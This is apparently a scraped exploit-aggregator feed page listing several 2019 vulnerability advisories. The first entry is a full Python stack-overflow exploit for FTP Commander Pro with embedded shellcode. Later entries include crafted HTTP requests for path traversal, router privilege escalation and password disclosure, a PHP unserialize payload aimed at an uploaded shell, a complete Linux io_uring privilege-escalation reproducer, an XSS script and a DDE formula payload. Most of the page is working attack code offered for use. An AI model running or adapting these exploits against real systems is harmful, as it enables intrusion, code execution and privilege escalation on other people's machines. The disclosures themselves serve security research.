Quantcast
Channel: Exploit Collector
Viewing all 13315 articles
Browse latest View live

FTP Commander Pro 8.03 Local Stack Overflow

$
0
0

FTP Commander Pro version 8.03 suffers from a local stack overflow vulnerability.


MD5 | 925505483680514fa64f204f5dad0883

# Exploit Title: FTP Commander Pro 8.03 - Local Stack Overflow 
# Date: 2019-12-12
# Exploit Author: boku
# Discovered by: UN_NON
# Original DoS: FTP Commander 8.02 - Overwrite (SEH)
# Original DoS Link: https://www.exploit-db.com/exploits/37810
# Software Vendor: http://www.internet-soft.com/
# Software Link: http://www.internet-soft.com/DEMO/cftpsetup.exe
# Version: Version 8.03 & Version 8.02 (same exploit for both)
# Tested on: Windows 10 Home 1909 (64-bit; OS-build=18363.418)
# Windows 10 Education 1909 (32-bit; OS-build=18363.418)
# Windows 10 Pro 1909 (32-bit; OS-build=18363.418)
# Windows Vista Home Basic SP1 (6.0.6001 Build 6001)
# Windows XP Professional (32-bit)- 5.1.2600 Service Pack 3 Build 2600
# Python Version: Python 2.7.16+

# Recreate:
# 1) Generate 'poc.txt' payload using python 2.7.x
# 2) On target Windows machine, open the file 'poc.txt' with notepad, then Select-All & Copy
# 3) Install & Open ftpCommander v8.03 (or v8.02)
# 4) Go to Menu Bar > FTP-Server Drop-down > click Custom Command
# - A textbox will appear on the bottom of the right window
# 5) Paste payload from generated txt file into textbox
# 6) Click "Do it"
# - The program will crash & calculator will open
# Other Security Issue:
# - The program's default install path is: C:\\cftp\cftp.exe

#!/usr/bin/python

blt = '\033[92m[\033[0m+\033[92m]\033[0m ' # bash green success bullet
err = '\033[91m[\033[0m!\033[91m]\033[0m ' # bash red error bullet

try:
# EIP offset at 4108 -- if you exceed 4112 bytes you will overwrite nSEH & SEH
nops='CGS[BOKU]J'*100 # 1000 nops that are ASCII friendly
# EIP jump lands at the beginning of the buffer
# Shellcode can be up to 4108 bytes by adjusting nops & replacing shellcode
# msfvenom -p windows/exec CMD='calc' -b '\x00' --platform windows -v shellcode -a x86 -f python -e x86/alpha_upper
#x86/alpha_upper succeeded with size 447 (iteration=0)
shellcode = b""
shellcode += b"\x89\xe7\xda\xd6\xd9\x77\xf4\x58\x50\x59\x49"
shellcode += b"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a"
shellcode += b"\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30"
shellcode += b"\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41"
shellcode += b"\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42"
shellcode += b"\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a"
shellcode += b"\x49\x4b\x4c\x4a\x48\x4d\x52\x35\x50\x35\x50"
shellcode += b"\x33\x30\x53\x50\x4c\x49\x4d\x35\x50\x31\x39"
shellcode += b"\x50\x52\x44\x4c\x4b\x50\x50\x56\x50\x4c\x4b"
shellcode += b"\x46\x32\x44\x4c\x4c\x4b\x31\x42\x42\x34\x4c"
shellcode += b"\x4b\x42\x52\x46\x48\x34\x4f\x4f\x47\x51\x5a"
shellcode += b"\x51\x36\x36\x51\x4b\x4f\x4e\x4c\x37\x4c\x33"
shellcode += b"\x51\x33\x4c\x44\x42\x56\x4c\x57\x50\x4f\x31"
shellcode += b"\x58\x4f\x54\x4d\x45\x51\x4f\x37\x5a\x42\x4b"
shellcode += b"\x42\x36\x32\x30\x57\x4c\x4b\x51\x42\x34\x50"
shellcode += b"\x4c\x4b\x50\x4a\x57\x4c\x4c\x4b\x30\x4c\x32"
shellcode += b"\x31\x34\x38\x4b\x53\x57\x38\x43\x31\x4e\x31"
shellcode += b"\x46\x31\x4c\x4b\x31\x49\x51\x30\x45\x51\x48"
shellcode += b"\x53\x4c\x4b\x47\x39\x44\x58\x4b\x53\x37\x4a"
shellcode += b"\x31\x59\x4c\x4b\x56\x54\x4c\x4b\x35\x51\x4e"
shellcode += b"\x36\x50\x31\x4b\x4f\x4e\x4c\x39\x51\x38\x4f"
shellcode += b"\x34\x4d\x45\x51\x59\x57\x30\x38\x4b\x50\x43"
shellcode += b"\x45\x5a\x56\x55\x53\x33\x4d\x4a\x58\x57\x4b"
shellcode += b"\x53\x4d\x31\x34\x54\x35\x4a\x44\x36\x38\x4c"
shellcode += b"\x4b\x31\x48\x36\x44\x45\x51\x38\x53\x35\x36"
shellcode += b"\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x30\x58\x35"
shellcode += b"\x4c\x53\x31\x49\x43\x4c\x4b\x44\x44\x4c\x4b"
shellcode += b"\x55\x51\x38\x50\x4d\x59\x47\x34\x31\x34\x56"
shellcode += b"\x44\x51\x4b\x51\x4b\x55\x31\x46\x39\x31\x4a"
shellcode += b"\x30\x51\x4b\x4f\x4d\x30\x31\x4f\x31\x4f\x50"
shellcode += b"\x5a\x4c\x4b\x42\x32\x4a\x4b\x4c\x4d\x31\x4d"
shellcode += b"\x53\x5a\x33\x31\x4c\x4d\x4b\x35\x48\x32\x33"
shellcode += b"\x30\x55\x50\x33\x30\x56\x30\x32\x48\x30\x31"
shellcode += b"\x4c\x4b\x42\x4f\x4d\x57\x4b\x4f\x38\x55\x4f"
shellcode += b"\x4b\x4c\x30\x4f\x45\x59\x32\x56\x36\x55\x38"
shellcode += b"\x59\x36\x5a\x35\x4f\x4d\x4d\x4d\x4b\x4f\x59"
shellcode += b"\x45\x37\x4c\x54\x46\x43\x4c\x54\x4a\x4d\x50"
shellcode += b"\x4b\x4b\x4b\x50\x34\x35\x33\x35\x4f\x4b\x51"
shellcode += b"\x57\x32\x33\x53\x42\x52\x4f\x42\x4a\x35\x50"
shellcode += b"\x50\x53\x4b\x4f\x39\x45\x42\x43\x53\x51\x42"
shellcode += b"\x4c\x32\x43\x53\x30\x41\x41"
# Fill the rest of the space with B's until we are at our EIP offset
offset = '\x42'*(4108-len(nops+shellcode))
# The EAX register holds a Pointer to the beginning of our buffer
# FF20 = jmp [eax]
# !mona find -o -s '\xFF\x20'
# 0x0041081a : '\xFF\x20' | startnull,ascii {PAGE_EXECUTE_READ} [ftpcomm.exe]
# | ASLR: False; Rebase: False; SafeSEH: False;
eip = '\x1a\x08\x41' # 3 byte overwrite so we can set EIP to start with 0x00
# After jmp [eax], we land at the beginning of our buffer
payload = nops+shellcode+offset+eip
File = 'poc.txt'
f = open(File, 'w') # open file for write
f.write(payload)
f.close() # close the file
print blt + File + " created successfully "

except:
print err + File + ' failed to create'


Roxy Fileman 1.4.5 For .NET Directory Traversal

$
0
0

Roxy Fileman version 1.4.5 for .NET suffers from a directory traversal vulnerability.


MD5 | 8284d1688030466bc863d4e452dcf4ff


===========================
Exploit Title: Roxy Fileman 1.4.5 for .NET - Directory Traversal
Software: Roxy Fileman
Version: 1.4.5
Vendor Homepage: http://www.roxyfileman.com/
Software Link: http://www.roxyfileman.com/download.php?f=1.4.5-net
CVE number: CVE-2019-19731
Found: 2019-12-06
Tested on: ASP.NET 4.0.30319 and Microsoft-IIS 10.0, Windows 10 Pro Build 17134
(using custom account as application pool identity for the IIS worker process).
Author: Patrik Lantz

===========================
Description
===========================
Roxy Fileman 1.4.5 for .NET is vulnerable to path traversal which can lead to file write in arbitrary locations depending on
the IIS worker process privileges.
This PoC demonstrates a crafted Windows shortcut file being uploaded and written to the Startup folder. The execution
of this file will be triggered on the next login.


Proof of Concept
===========================

It's possible to write an uploaded file to arbitrary locations using the RENAMEFILE action.
The RenameFile function in main.ashx does not check if the new file name 'name' is a valid location.
Moreover, the default conf.json has an incomplete blacklist for file extensions which in this case
allows Windows shortcut files to be uploaded, alternatively existing files can be renamed to include
the .lnk extension.

1) Create a shortcut file

By using for example the target executable C:\Windows\System32\Calc.exe
Remove the .lnk extension and rename it to use the .dat extension.


2) Upload the file

Either upload the .dat file manually via the Roxy Fileman web interface
or programmatically using a HTTP POST request.

Details of the request:

POST /wwwroot/fileman/asp_net/main.ashx?a=UPLOAD HTTP/1.1
Host: 127.0.0.1:50357
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------159382831523528
Content-Length: 924
Origin: http://127.0.0.1:50357
Connection: close
Referer: http://127.0.0.1:50357/wwwroot/fileman/
Cookie: roxyld=%2Fwwwroot%2Ffileman%2FUploads%2Ftest2; roxyview=list

-----------------------------159382831523528
Content-Disposition: form-data; name="action"

upload
-----------------------------159382831523528
Content-Disposition: form-data; name="method"

ajax
-----------------------------159382831523528
Content-Disposition: form-data; name="d"

/wwwroot/fileman/Uploads/test2
-----------------------------159382831523528
Content-Disposition: form-data; name="files[]"; filename="poc.dat"
Content-Type: application/octet-stream

...data omitted...
-----------------------------159382831523528--



3) Write the file to the Startup folder using the RENAMEFILE action
The new filename is set via the n parameter. The correct path can be identified by trial and error depending
on the location of wwwroot on the filesystem and the privileges for the IIS worker process (w3wp.exe).

If the necessary directories do not exist, they can be created using the CREATEDIR action which also
is vulnerable to path traversal.


POST /wwwroot/fileman/asp_net/main.ashx?a=RENAMEFILE&f=%2Fwwwroot%2Ffileman%2FUploads%2FDocuments%2Fpoc.dat&n=../../../../../../../../AppData/Roaming/Microsoft/Windows/Start%20Menu/Programs/Startup/poc.txt.lnk HTTP/1.1
Host: 127.0.0.1:50357
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 66
Origin: http://127.0.0.1:50357
Connection: close
Referer: http://127.0.0.1:50357/wwwroot/fileman/
Cookie: roxyld=%2Fwwwroot%2Ffileman%2FUploads%2Ftest2; roxyview=list

f=%2Fwwwroot%2Ffileman%2FUploads%2Ftest2%2Fpoc.dat&n=poc.dat



Workaround / Fix:
===========================

Patch the main.ashx code in order to perform checks for all paths that they are valid in the following actions:
CREATEDIR, COPYFILE and RENAMEFILE.

Recommendations for users of Roxy Fileman:
- Add lnk file extension to the conf.json under FORBIDDEN_UPLOADS, and aspx since it is not included in the blacklist by default.



Timeline
===========================
2019-12-06: Discovered the vulnerability
2019-12-06: Reported to the vendor (vendor is unresponsive)
2019-12-11: Request CVE
2019-12-13: Advisory published

Discovered By:
===========================
Patrik Lantz


Squiz Matrix CMS 5.5.x.x Code Execution / Information Disclosure

$
0
0

Squiz Matrix CMS suffers from PHP unserialization code execution, information disclosure, and arbitrary file deletion vulnerabilities.


MD5 | 2a89eaa5d695460978b8a6a34c1d28bb

Introduction
============
ZX Security identified several vulnerabilities the Squiz Matrix CMS that
can be chained together to gain pre-authenticated remote code execution in
some circumstances.

Affected Versions
=================
The issues in this advisory affect the following versions of Squiz Matrix:
* 5.5.0 prior to 5.5.0.3
* 5.5.1 prior to 5.5.1.8
* 5.5.2 prior to 5.5.2.4
* 5.5.3 prior to 5.5.3.3

Technical Findings
==================

PHP unserialization of user input may result in remote code execution
---------------------------------------------------------------------
CVE-2019-19373

When an instance of a Remote Content page exists within a Squiz Matrix CMS
website, user input is passed directly and unsantized to the PHP function
unserialize. In some versions of PHP (e.g. before 5.4.24), this can be
leveraged into a LFI issue. If combined with arbitrary file upload with the
Squiz Matrix CMS website, this leads to remote code execution.

Within
packages/cms/page_templates/page_remote_content/page_remote_content.inc,
the POST parameter
“page_remote_content_[pageid]_sq_remote_input_file_names” is passed to
unserialize. No generic unserialization gadgets were identified within the
default installation, so the autoloader can be attacked instead.

There are multiple autoloaders that are enabled during the standard Squiz
Matrix execution path. Of note is one found in
vendor/simplesamlphp/saml2/src/_autoload.php. When given a class name that
contains characters such as “.” and “/”, it will directly use these to
include a file. This is a local file inclusion issue within the code,
though is codified within PSR standards, and not normally exploitable. It
should be noted however that underscores are not valid within a filename
included in this method.

Using this class, we can potentially include a file simply by having PHP
attempt to instantiate a class with a malicious name.

There is a second autoloader within the codebase that is not run by
default: vendor/gettext/languages/src/autoloader.php. This autoloader
contains the same kind of issue, however without the underscore limitation
(though with other limitations, such as the class beginning with a certain
string). Once again, this is part of the PSR specification, and not
normally exploitable.

PHP includes within its unserialize function a check on the class name of a
deserialized object to ensure it does not contain invalid characters. This
means we cannot directly trigger the LFI issue using deserialize.

Instead, we can use a more standard deserialize exploitation example, where
we instantiate a class that calls specific code on __destruct. Through
reviewing the codebase, multiple places were found that are applicable to
this case.

Consider:
vendor/simplesamlphp/simplesamlphp/lib/SimpleSAML/Store/Redis.php. The
destruct method of this class calls the `method_exists` function on the
`$this->redis` variable, which we can control. The `method_exists`
function, among many others, will trigger the autoloader with the first
variable specified (in this case, `$this->redis`, which we control). It
should be noted once again that this is not the same on all versions of PHP
(see references at the end of this advisory).

The last part of exploitation is a deserialize technique called "fast
destruct". This allows an object to be destructed within a single
deserialize call, which allows use to instantiate two classes which trigger
the LFI exploit sequentially within a single request.

Putting together these steps, we can generate an unserialize payload like
this:

$r = new
SimpleSAML\Store\Redis('../../../../vendor/gettext/languages/src/autoloader');
$r2 = new SimpleSAML\Store\Redis('Gettext\Languages\../../../../x.php'); //
File to include
echo serialize(array($r, $r2));

This gives a payload such as:

a:2:{i:0;O:22:"SimpleSAML\Store\Redis":1:{s:5:"redis";s:51:"../../../../vendor/gettext/languages/src/autoloader";}i:1;O:22:"SimpleSAML\Store\Redis":1:{s:5:"redis";s:220:"Gettext\Languages\../../../../data/private/assets/form_email/0008/38978/incomplete_attachments/e7b54mbvmmkfuip5tnogfter9k4ddndf81caoso02ceknl1m5ikmt1ijnn9u9bnaj861iv3tgar1e3od3bi4l13uctm1l5uotiubrf2/38978_q1/simple_shell";}}

If we modify this with the fast destruct method, we get the payload:

a:2:{i:0;O:22:"SimpleSAML\Store\Redis":1:{s:5:"redis";s:51:"../../../../vendor/gettext/languages/src/autoloader";}i:0;O:22:"SimpleSAML\Store\Redis":1:{s:5:"redis";s:220:"Gettext\Languages\../../../../data/private/assets/form_email/0008/38978/incomplete_attachments/e7b54mbvmmkfuip5tnogfter9k4ddndf81caoso02ceknl1m5ikmt1ijnn9u9bnaj861iv3tgar1e3od3bi4l13uctm1l5uotiubrf2/38978_q1/simple_shell";}}

Once we send this request to the server on a Remote Page type, we achieve
LFI of a file we previously uploaded to the server, resulting in remote
code execution.

Arbitrary file deletion and information disclosure in file upload form
----------------------------------------------------------------------
CVE-2019-19374

When an instance of a custom form with a File Upload Field exists within a
Squiz Matrix CMS website, users of the website may be able to delete
arbitrary files from the server through the delete uploaded file feature.
Additionally, this feature discloses the full path of files uploaded to the
server, a form of information disclosure.

When a user uploads a file to a form, they can keep track of the files with
the "prev_files" array, which is rendered in the HTML after a file is
uploaded. This array contains the full path to each uploaded file. The
relevant code can be found in:

core/assets/form/form_question_types/form_question_type_file_upload/form_question_type_file_upload.inc

An attacker can replace this path to one of their choosing, such as setting
it to "data/private/conf/db.inc", and choose the delete file option. This
deletes the file from the server.

Disclosure Timeline
===================

ZX Security would like to commend the prompt response and resolution of
these reported issues by the vendor.

Vendor notification: August 09, 2019
Vendor response: August 09, 2019
Fixed versions released: August 29, 2019

References
==========

For more information on the PHP unserailize fast destruct technique, see:
https://github.com/ambionics/phpggc.
For more information on exploiting the PHP autoloader, including
information on exactly which PHP versions are affected, see:
https://medium.com/@ss23/php-autloading-local-file-inclusion-by-design-71aafe627877



D-Link DIR-615 Privilege Escalation

$
0
0

D-Link DIR-615 suffers from a privilege escalation vulnerability.


MD5 | 493e75de8e7ec25a2de010cb3530fb22

# Exploit Title: D-Link DIR-615 - Privilege Escalation
# Date: 2019-12-10
# Exploit Author: Sanyam Chawla
# Vendor Homepage: http://www.dlink.co.in
# Category: Hardware (Wi-fi Router)
# Hardware Link: http://www.dlink.co.in/products/?pid=678
# Hardware Version: T1
# Firmware Version: 20.07
# Tested on: Windows 10 and Kali linux
# CVE: N/A

# Reproduction Steps:
# Login to your wi-fi router gateway with normal user credentials [i.e: http://192.168.0.1]
# Go to the Maintenance page and click on Admin on the left panel.
# There is an option to create a user and by default, it shows only user accounts.
# Create an account with a name(i.e ptguy) and change the privileges from user to root(admin)
# by changing privileges id (1 to 2) with burp suite.

# Privilege Escalation Post Request

POST /form2userconfig.cgi HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 122
Origin: http://192.168.0.1
Connection: close
Referer: http://192.168.0.1/userconfig.htm
Cookie: SessionID=
Upgrade-Insecure-Requests: 1

username=ptguy&privilege=2&newpass=pentesting&confpass=pentesting&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=Send

# Now log in with newly created root (ptguy) user. You have all administrator rights.

Linux sendmsg() Privilege Escalation

$
0
0

Linux suffers from a privilege escalation vulnerability via io_uring offload of sendmsg() onto kernel thread with kernel creds.


MD5 | 7594e7ead982b1ba2cb61b42fa00ac35

Linux: privilege escalation via io_uring offload of sendmsg() onto kernel thread with kernel creds

Since commit 0fa03c624d8f (\"io_uring: add support for sendmsg()\", first in v5.3),
io_uring has support for asynchronously calling sendmsg().
Unprivileged userspace tasks can submit IORING_OP_SENDMSG submission queue
entries, which cause sendmsg() to be called either in syscall context in the
original task, or - if that wasn't able to send a message without blocking - on
a kernel worker thread.

The problem is that sendmsg() can end up looking at the credentials of the
calling task for various reasons; for example:

- sendmsg() with non-null, non-abstract ->msg_name on an unconnected AF_UNIX
datagram socket ends up performing filesystem access checks
- sendmsg() with SCM_CREDENTIALS on an AF_UNIX socket ends up looking at
process credentials
- sendmsg() with non-null ->msg_name on an AF_NETLINK socket ends up performing
capability checks against the calling process

When the request has been handed off to a kernel worker task, all such checks
are performed against the credentials of the worker - which are default kernel
creds, with UID 0 and full capabilities.

To force io_uring to hand off a request to a kernel worker thread, an attacker
can abuse the fact that the opcode field of the SQE is read multiple times, with
accesses to the struct msghdr in between: The attacker can first submit an SQE
of type IORING_OP_RECVMSG whose struct msghdr is in a userfaultfd region, and
then, when the userfaultfd triggers, switch the type to IORING_OP_SENDMSG.

Here's a reproducer for Linux 5.3 that demonstrates the issue by adding an
IPv4 address to the loopback interface without having the required privileges
for that:

==========================================================================
$ cat uring_sendmsg.c
#define _GNU_SOURCE
#include <pthread.h>
#include <unistd.h>
#include <stdio.h>
#include <err.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/ioctl.h>
#include <linux/rtnetlink.h>
#include <linux/if_addr.h>
#include <linux/io_uring.h>
#include <linux/userfaultfd.h>
#include <linux/netlink.h>

#define SYSCHK(x) ({ \\
typeof(x) __res = (x); \\
if (__res == (typeof(x))-1) \\
err(1, \"SYSCHK(\" #x \")\"); \\
__res; \\
})

static int uffd = -1;
static struct iovec *iov;
static struct iovec real_iov;
static struct io_uring_sqe *sqes;

static void *uffd_thread(void *dummy) {
struct uffd_msg msg;
int res = SYSCHK(read(uffd, &msg, sizeof(msg)));
if (res != sizeof(msg)) errx(1, \"uffd read\");
printf(\"got userfaultfd message\
\");

sqes[0].opcode = IORING_OP_SENDMSG;

union {
struct iovec iov;
char pad[0x1000];
} vec = {
.iov = real_iov
};
struct uffdio_copy copy = {
.dst = (unsigned long)iov,
.src = (unsigned long)&vec,
.len = 0x1000
};
SYSCHK(ioctl(uffd, UFFDIO_COPY, &copy));
return NULL;
}

int main(void) {
// initialize uring
struct io_uring_params params = { };
int uring_fd = SYSCHK(syscall(SYS_io_uring_setup, /*entries=*/10, &params));
unsigned char *sq_ring = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, uring_fd, IORING_OFF_SQ_RING));
unsigned char *cq_ring = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, uring_fd, IORING_OFF_CQ_RING));
sqes = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, uring_fd, IORING_OFF_SQES));

// prepare userfaultfd-trapped IO vector page
iov = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0));
uffd = SYSCHK(syscall(SYS_userfaultfd, 0));
struct uffdio_api api = { .api = UFFD_API, .features = 0 };
SYSCHK(ioctl(uffd, UFFDIO_API, &api));
struct uffdio_register reg = {
.mode = UFFDIO_REGISTER_MODE_MISSING,
.range = { .start = (unsigned long)iov, .len = 0x1000 }
};
SYSCHK(ioctl(uffd, UFFDIO_REGISTER, &reg));
pthread_t thread;
if (pthread_create(&thread, NULL, uffd_thread, NULL))
errx(1, \"pthread_create\");

// construct netlink message
int sock = SYSCHK(socket(AF_NETLINK, SOCK_DGRAM, NETLINK_ROUTE));
struct sockaddr_nl addr = {
.nl_family = AF_NETLINK
};
struct {
struct nlmsghdr hdr;
struct ifaddrmsg body;
struct rtattr opthdr;
unsigned char addr[4];
} __attribute__((packed)) msgbuf = {
.hdr = {
.nlmsg_len = sizeof(msgbuf),
.nlmsg_type = RTM_NEWADDR,
.nlmsg_flags = NLM_F_REQUEST
},
.body = {
.ifa_family = AF_INET,
.ifa_prefixlen = 32,
.ifa_flags = IFA_F_PERMANENT,
.ifa_scope = 0,
.ifa_index = 1
},
.opthdr = {
.rta_len = sizeof(struct rtattr) + 4,
.rta_type = IFA_LOCAL
},
.addr = { 1, 2, 3, 4 }
};
real_iov.iov_base = &msgbuf;
real_iov.iov_len = sizeof(msgbuf);
struct msghdr msg = {
.msg_name = &addr,
.msg_namelen = sizeof(addr),
.msg_iov = iov,
.msg_iovlen = 1,
};

// send netlink message via uring
sqes[0] = (struct io_uring_sqe) {
.opcode = IORING_OP_RECVMSG,
.fd = sock,
.addr = (unsigned long)&msg
};
((int*)(sq_ring + params.sq_off.array))[0] = 0;
(*(int*)(sq_ring + params.sq_off.tail))++;
int submitted = SYSCHK(syscall(SYS_io_uring_enter, uring_fd, /*to_submit=*/1, /*min_complete=*/1, /*flags=*/IORING_ENTER_GETEVENTS, /*sig=*/NULL, /*sigsz=*/0));
printf(\"submitted %d, getevents done\
\", submitted);
int cq_tail = *(int*)(cq_ring + params.cq_off.tail);
printf(\"cq_tail = %d\
\", cq_tail);
if (cq_tail != 1) errx(1, \"expected cq_tail==1\");
struct io_uring_cqe *cqe = (void*)(cq_ring + params.cq_off.cqes);
if (cqe->res < 0) {
printf(\"result: %d (%s)\
\", cqe->res, strerror(-cqe->res));
} else {
printf(\"result: %d\
\", cqe->res);
}
}
$ gcc -Wall -pthread -o uring_sendmsg uring_sendmsg.c
$ ip addr show dev lo
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
$ ./uring_sendmsg
got userfaultfd message
submitted 1, getevents done
cq_tail = 1
result: 32
$ ip addr show dev lo
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet 1.2.3.4/32 scope global lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
$
==========================================================================

The way I see it, the easiest way to fix this would probably be to grab a
reference to the caller's credentials with get_current_cred() in
io_uring_create(), then let the entry code of all the kernel worker threads
permanently install these as their subjective credentials with override_creds().
(Or maybe commit_creds() - that would mean that you could actually see the
owning user of these threads in the output of something like \"ps aux\". On the
other hand, I'm not sure how that impacts stuff like signal sending, so
override_creds() might be safer.) It would mean that you can't safely use an
io_uring instance across something like a setuid() transition that drops
privileges, but that's probably not a big problem?

While the security bug was only introduced by the addition of IORING_OP_SENDMSG,
it would probably be beneficial to mark such a change for backporting all the
way to v5.1, when io_uring was added - I think e.g. the SELinux hook that is
called from rw_verify_area() has so far always attributed all the I/O operations
to the kernel context, which isn't really a security problem, but might e.g.
cause unexpected denials depending on the SELinux policy.

(For people who care about such things: I have requested a CVE identifier from MITRE for this.)


This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.

Related CVE Numbers: CVE-2019-19241.



Found by: jannh@google.com


Serv-U FTP Server 15.1.7 Persistent Cross Site Scripting

$
0
0

Serv-U FTP Server version 15.1.7 suffers from a persistent cross site scripting vulnerability.


MD5 | 93f44f4fbef1634cd60607a5bd840c6e

Issue:                  Stored Cross-Site Scripting

CVE: CVE-2019-13182

Security researcher: Richard Tan @ The Missing Link Security

Product name: Serv-U FTP Server

Product version: Tested on 15.1.7

Fixed in: Serv-U 15.1.7 Hotfix 2



# Overview

The application is vulnerable to a stored cross-site scripting
vulnerability.The user's "Full Name" field and "HTTP Login Title Text" field
lacked input validation allowing Javascript code to be inserted and executed
in the context the user's browser session either when the victim logs to the
web client or browses to the Serv-U server login page.

A privilege user could manipulate the affected parameter on an existing
user's account so that Javascript is executed on the client's browser when
the victim logs into his account.

For example, a successful XSS attack could result in the attacker
redirecting the user to a phishing/malicious site or performing actions as
the victim on the Serv-U application.



**Injection Point in user properties**

* Full Name

* HTTP Login Title Text



# Proof of concept

1) Login as a user that has privileges to create or modify users.

2) Create a new user and add the following payload into the "Fullname"
parameter.
<script>window.location.replace("http://www.example.com");</script>

3) Login as the victim user and observe the user being redirected to
www.example.com <http://www.example.com> when accessing the web client.
Note that exploiting the "HTTP Login Title Text" field means that the
Javascript payload will be executed when any user browses to the Serv-U
login page.




Serv-U FTP Server 15.1.7 CSV Injection

$
0
0

Serv-U FTP Server version 15.1.7 suffers from a CSV injection vulnerability.


MD5 | 4b705c0bbe42992ddfdc2fadbd731c13

Issue:                  CSV injection vulnerability

CVE: CVE-2019-13181

Security researcher: Richard Tan @ The Missing Link Security

Product name: Serv-U FTP Server

Product version: Tested on 15.1.7

Fixed in: Serv-U 15.1.7 Hotfix 2





# Overview

The application allowed table entries to contain a string which could be
evaluated by Excel as a Dynamic Data Exchange (DDE) macro.

Privileged users who has the appropriate rights to modify or create users
could insert values into user properties which is evaluated as macros if the
user list is exported as an Excel format.



Steps to reproduce (Proof of concept):

1) Login as a user that has privileges to create or modify users.

2) Create a new user and add the following payload into the
"description" field. "=cmd|'/C calc.exe'!A0"

3) Export the user list with a file name "CSVinjection.csv" on the
application server.

4) On the application server, locate the file and execute it. Notice
that a warning sign could be prompted depending the Excel's security
settings. (If so click enable)

5) Observe that the calculator tool is executed. This is a proof of
concept however an adversary could exploit this weakness to potentially gain
access to the application server (or from where ever the file is executed
from).




Control Web Panel 0.9.8.864 phpMyAdmin Password Disclosure

$
0
0

Control Web Panel versions 0.9.8.856 through 0.9.8.864 suffer from a phpMyAdmin password disclosure vulnerability.


MD5 | 350c05e4dacfce98d3811879f2066056

Exploit Title       : CWP (Control Web Panel) phpMyAdmin password access
Date : 20 Aug 2019
Exploit Author : Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak
Vendor Homepage : https://control-webpanel.com/
Software Link : Not available, user panel only available for lastest version
Version : 0.9.8.856 - 0.9.8.864
Tested on : CentOS 7.6.1810 (Core) FireFox 68.0.1 (64-bit)
CVE-Number : CVE-2019-14782, CVE-2019-15235
Reference : N/A

1. Login as an low privileged user
2. Get Session file name from path "/tmp" or /home/[USERNAME]/tmp/session/sess_xxxxxx"
3. Get token value from "/usr/local/cwpsrv/logs/access_log"
4. Make a request to obtain target password

GET /cwp_[token]/victim?module=pma HTTP/1.1
Host: 192.168.1.1:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Connection: close
Referer: https://192.168.1.1:2083/
Cookie: PHPSESSID=[sess_xxxxxx]


Microsoft Teams Instant Messenger DLL Hijacking

$
0
0

Microsoft Teams Instant Messenger application on Windows 7 SP1 fully patched is vulnerable to remote DLL hijacking.


MD5 | 9bf58c644aeb9728a0ae475a091ca8b3

Microsoft Teams Instant Messenger application on Windows 7 SP1 fully patched is vulnerable to remote DLL loading / hijacking because :

a) The OS does not ship with the affected library(ies)
b) The Teams application does not provide the library(ies)

So, it performs a search according to the 'PATH' environment variable, including the directory where the application resides and the current working directory, therefore allowing attackers to remotely exploit the issue, through the registered URL protocol:

By eg. creating an Office document containing a hyperlink like "msteams:http://0wnm3.com/x.jpg" is enough to trigger the issue. (User needs to click it, or eg. use OLE objects that automates the action upon document opening). The file should be placed on a WebDAV or SMB share along a valid dll (with a 'DllMain' entry point) named "shcore.dll" or "wldp.dll" or "dcomp.dll" ... And even more. Notice the DLL must match the platform of Teams app (On Windows x64, by default Teams x64 is installed so the DLL must be x64 as well.)

Tested on Teams v.1.2.00.22654 (latest version) on Windows 7 / 2008 fully patched as of December 2019.


Note: Microsoft was contacted on September 21, 2019.

Replied on the same day with an automated message, saying I would be contacted when the case was reviewed.

Usually in a week or so they reply saying whether they reproced or not and/or whether it will be patched or not.


On December, 10, 2019, I replied to the thread asking for feedback. No feedback received until December, 15, so I decided to go public.


* Eduardo Braun Prado.

Bash Profile Persistence

$
0
0

